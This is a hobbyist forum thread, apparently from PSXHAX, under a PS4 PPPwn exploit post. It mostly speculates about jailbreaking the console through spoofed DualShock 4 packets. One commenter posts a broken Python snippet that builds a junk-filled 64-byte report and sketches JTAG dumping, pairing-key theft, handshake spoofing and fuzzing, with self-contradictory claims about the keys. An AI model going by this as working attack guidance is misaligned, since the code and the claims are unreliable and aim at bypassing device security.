PPPwn: PlayStation 4 PPPoE RCE PS4 Kernel Exploit to 11.00 by TheOfficialFloW

RiZK · Apr 4, 2025 at 9:12 AM

Great news and highly appreciated, works perfectly.

aperson · Apr 4, 2025 at 12:49 PM

@Catina98, how would that work though? I don't know enough about it to shoot down the idea but wouldn't an exploit require more information than whatever is getting passed through the controller?

If the controller serves as a sort of doorway in, it'd have to be wide enough to pass a package (so to speak). By that rationale, wouldn't you also be able to exploit an older gen controller, like a DS3? If so I'd think that would open a host of opportunities by way of other peripherals. I don't think it's quite so simple, unfortunately.

It's interesting though. I hadn't thought of it.

pspsps2007 · Apr 4, 2025 at 2:07 PM

great, i'm using this now, thanks

Catina98 · Apr 4, 2025 at 2:12 PM

@aperson
Hey there! Love that you’re digging into this with me—it’s a fun puzzle to chew on! You’re totally right to wonder how it’d work and whether the controller’s tiny data stream could really pull off something like a jailbreak. Let’s break it down together.

So, the DualShock 4 is passing these little 64-byte packets to the PS4, like 250 times a second over Bluetooth (or 500 if wired), which comes out to about 128-256 kbps of data. That’s not a ton—it’s basically just saying “X button’s pressed” or “stick’s at this angle.”

You’re spot-on that an exploit usually needs more juice, like a big chunk of code to sneak in and take over. The controller’s doorway feels more like a mail slot than a garage, right? But here’s where it gets interesting: it might not need to carry the whole “package” itself.

If there’s a glitch in how the PS4 reads those packets—like if it doesn’t check them carefully enough—a tiny, messed-up packet could crash something or trick the system into running a little bit of bad code. Then, maybe, you pair that with another trick (like those browser exploits people use) to shove the bigger payload through.

Your point about older controllers like the DualShock 3 is super smart! The DS3 works with the PS3 over Bluetooth too, and it’s even older, so yeah, if this idea holds water, you’d think it could apply there—or even to other peripherals like headsets or keyboards. The catch is, the PS4’s built to only trust the DS4, and it’s got this authentication thing going on to make sure it’s legit. The DS3 might not even get through the door unless you spoof it perfectly, and other gadgets probably face the same wall. Still, you’ve got me thinking—maybe there’s a whole family of peripheral tricks waiting to be found!

You’re dead right it’s not simple—Sony’s not sleeping on this stuff. The PS4’s probably got some decent locks on that controller data, and even if you crack it, you’d need a bigger exploit on the console side to really take over. My hunch is the DS4’s lack of updates (unlike the PS5’s controller) might leave a crack open—like a buffer overflow or something (where too much data spills over and messes with the system). It’s a long shot, but since it’s been the same forever, any weak spot’s just sitting there, unpatched.

I’m no tech wizard either, so I’m just tossing spaghetti at the wall here! It’s cool you hadn’t thought of it before—neither had I ‘til recently.

What do you think—any other angles we could poke at?

Thanks for jumping in—this is way more fun with someone else brainstorming!

aperson · Apr 5, 2025 at 11:28 AM

@Catina98 I like your mail slot analogy, so I'm going to roll with that. If I'm understanding correctly, we're sitting outside, feeding envelopes through this mail slot. Inside, Sony is opening each envelope and checking to make sure it doesn't contain anything nefarious, while also sorting the mail by type.

The mail we're passing through the slot, itself can't really do a whole lot; it's just mail. However, inside the building we have a friend who just happens to be one of the mail sorters. Together, we've developed a secret language that only we're going to pick up on, when passed through notes. Effectively, we're looking to pass instructions along to our friend on the inside that direct him toward a back door that he might open for us to sneak through. For whatever reason, in this example, we'll say we know where the door is, but he does not (explaining the necessity for the note passing).

Does that sound about right?

How does the console identify a peripheral, exactly? Or maybe a better question is how does the peripheral identify itself to the console? Is there a way for a PS3 controller to introduce itself as a PS4 controller? Can a third party device trick the console into believing it's something it isn't? To our previous analogy, can we convince Sony we're the UPS guy, knock on the door and have them just let us in, directly?

Sorry for all the stupid analogies, it just helps me get a better handle on this stuff.

Also, thanks for replying! That was helpful.

Catina98 · Apr 5, 2025 at 12:39 PM

@aperson
First, your mail slot analogy is gold—it’s tight, but maybe just wide enough for a clever trick. That 64-byte packet the DualShock 4 (DS4) sends it is small indeed. If the PS4’s sloppy with how it parses those packets, a tiny, messed-up one could be the spark. Your “secret language” idea with an inside helper? That’s like crafting a packet to exploit a flaw—say, a buffer overflow—and then leaning on a bigger exploit (like a browser hack) to finish the job. Two-step infiltration!

Now, let’s get gritty with the DS4’s guts. It’s got an STM32F103 (or MT3610N variant), an ARM Cortex-M3 clocked at 72 MHz, handling inputs and packet prep. The Broadcom BCM20730 runs Bluetooth 2.1+EDR (real-world max ~1.5 Mbps), and there’s an InvenSense MPU-6050 for motion. I have a "stone age" like Python script that might not even have any sense, but maybe? A fake 64-byte packet, pressing X (0x40) and stuffing the rest with 0xFF junk to see if the PS4 chokes. If the console’s input parser doesn’t sanitize that properly—boom, maybe a crash or a code jump. Here’s a very ultra basic and maybe not even logical code:

Code:

def make_fake_packet():

packet = bytearray(64) # 64 bytes, like the real deal

packet[0] = 0x01 # Report ID, says “I’m a controller input”

packet[1] = 0x00 # Padding or version

packet[2] = 0x40 # X button down

packet[3] = 0x00 # No other buttons

packet[4] = 255 # Left X full right

packet[5] = 128 # Left Y neutral

packet[6] = 128 # Right X neutral

packet[7] = 128 # Right Y neutral

for i in range(8, 64):

packet = 0xFF # Junk to test overflow

return packet

fake_packet = make_fake_packet()

print("Fake packet:", fake_packet.hex())

# To send: needs pybluez (Bluetooth) or pyusb (USB) hookup

Sending that packet’s the trick—you’d need a Bluetooth rig (pybluez) or USB spoofing (pyusb) and the PS4’s MAC address. But here’s where it gets wild: the DS4’s firmware on that STM32 hasn’t budged since 2013. No updates, no patches. If there’s a hole—like bad packet handling—it’s still there, ripe for picking. You could crack the STM32 open via JTAG (solder some wires, dump the firmware), tweak it to send whatever you want, and the PS4 would see it as legit. The BCM20730’s Bluetooth? Snag its pairing keys, spoof the handshake, and you’ve got a 1.5 Mbps pipe—way more than the 256 kbps the DS4 normally uses. Plenty of room for sneaky data. Sounds so easy, but it is just so hard!

To your question about peripherals identifying themselves: the DS4 does a cryptographic handshake over Bluetooth. It’s got a key or certificate baked in, and the PS4 checks it to say, “Yep, you’re family.” A DualShock 3 (DS3) won’t pass muster—its auth is PS3-specific. Spoofing it as a DS4? Doable if you crack the DS4’s keys and mimic the exchange – the keys are unique – a 2016 or 2022 DS4 would work for a PS4 PRO, SLIM or FAT -how? Well, logics get's me to the idea: Same key since EVER for every single ps4 console model and DS4. Third-party devices sometimes pull this off by reverse-engineering or licensing Sony’s tech. It’s like faking a UPS badge—if the PS4’s auth has a weak spot (say, a reused key or lazy check), you might waltz in.

Another angle: what if you flash the STM32 with custom firmware to send a malicious file disguised as normal input? The PS4 trusts the DS4 implicitly—authentication clears it—so a tiny 64-byte “package” could nudge a console-side bug. Or widen the net: the PS4 takes USB keyboards, headsets, even the Camera. Each has its own handshake—sloppier parsing there could be a backdoor too.

Sony’s got locks, sure, but static hardware like the DS4 is a sitting duck. No firmware updates means any flaw’s frozen in time.

Had no idea that tossing spaghetti at the wall could be so much fun!

aperson · Apr 5, 2025 at 11:45 PM

@Catina98 I'll keep this relatively short, cuz I'm sure I'm starting to boring you with these questions.

You mentioned the DS4 firmware hasn't changed in over a decade and by way of soldering some wires and grabbing some pairing keys, what we're talking about is theoretically possible, yet it's difficult to accomplish. Why is that?

Is the system just constructed securely enough that sneaking anything past is a pipe dream? Forgive my lack of technical awareness, but is this more of:

a) There's a bouncer at the entrance who is really vigilant. or
b) There are a whole sequence of checkpoints that are more lenient but collectively able to cover for each other (meaning you may be able to fool your way through one or two checkpoints, but not the entire chain)?

I imagine the two scenarios would require very different solutions.

Catina98 · Apr 6, 2025 at 6:57 AM

Hey @aperson

Loving how deep we’re diving into this PS4 controller jailbreak rabbit hole—your questions are keeping me on my toes! Let’s chew on why this is such a beast despite the DS4’s static firmware.

You’re right to zero in on that 2013 firmware—it’s a sitting duck in theory. No updates means any flaw’s just chilling there, begging to be poked. Soldering JTAG pins to the STM32 or snagging Bluetooth keys could let us hijack the controller, no question.

The DS4’s handshake is step one—custom crypto, probably a unique key per controller or a console-tied secret. Cracking that’s a slog; you’d need to reverse-engineer firmware or sniff a live exchange, both a pain in the butt. Say you nail it and spoof a DS4—great! But then the PS4’s input parser’s like, “Hold up, what’s this packet?” Your 0xFF junk might crash it if Sony skimped on bounds checking, but they’ve had a decade to tighten that up. It’s not one beefy guard; it’s a crew of decent ones overlapping just enough to block you.

Think of it like tossing a note through the mail slot hoping your buddy inside knows the backdoor’s combo. The PS4’s OS is locked tight—hypervisor, sandboxes, the lot. Fooling one layer (auth) might work, but the next (validation or kernel) trips you. It’s a chain, not a single weak link. BUT I HAVE HOPES, SINCE PPPoE OPENS THE GATE!

Solution-wise, if it’s one bouncer (say, a sloppy parser), you spam packets ‘til it cracks. More realistic, it’s the chain: spoof the DS4, trigger a glitch, pivot to a known flaw. I’d poke at the parser next—maybe fuzz it with weird packets and pray for a buffer overflow.

This is all I’ve got—hopefully someone who really has deep knowledge out there can make this jailbreak fantasy real!

So happy that I found this place!

Bless this flying spaghetti, bless PSXHAX!

aperson · Apr 6, 2025 at 11:28 AM

Thanks for spinning your wheels with me, @Catina98!

I have one more question for you. You mentioned spamming packets. Does the rate at which we send the packets make a difference? If the console is receiving packets (I'm assuming each packet contains x data which fits into a sequence that comprises a larger instruction of some kind) can sending the right series of packets at just the right moment trigger a crash?

What I mean is, if each packet were akin to letters of the alphabet—each filling in a blank that adds up to spell a word—would ramming through a different letter than expected, in the right moment allow us to form a different word than what the console is expecting?

A stupid example would be the system is trying to spell the word 'butter' one letter at a time, and we sneak in an 'l' at just the right moment to trick it into spelling 'butler'. Does the timing that the packets are received influence the system's ability to handle the information?

Catina98 · Apr 6, 2025 at 2:13 PM

@aperson
Yes, packet timing could matter! The PS4 expects 250 packets/sec (Bluetooth) or 500 (wired), each 64 bytes, forming a steady stream of controller inputs. If you spam packets faster or at precise moments—like sneaking an 'l' into 'butter' to make 'butler'—you might disrupt the parser’s rhythm. A well-timed rogue packet could exploit a flaw, like a buffer overflow, if the system’s not ready to handle the flood or sequence shift. It’s less about raw speed and more about hitting the right window to confuse the console’s input handling.

Tricky, but plausible!
The tech and coding can be done, but success hinges on an unpatched PS4 flaw and surgical precision. Spaghetti’s on the wall—someone’s gotta test if it sticks

Cheers!

PPPwn: PlayStation 4 PPPoE RCE PS4 Kernel Exploit to 11.00 by TheOfficialFloW

Comments

RiZK

aperson

pspsps2007

Catina98

aperson

Catina98

aperson

Catina98

aperson

Catina98

PSXHAX Categories

Share This Page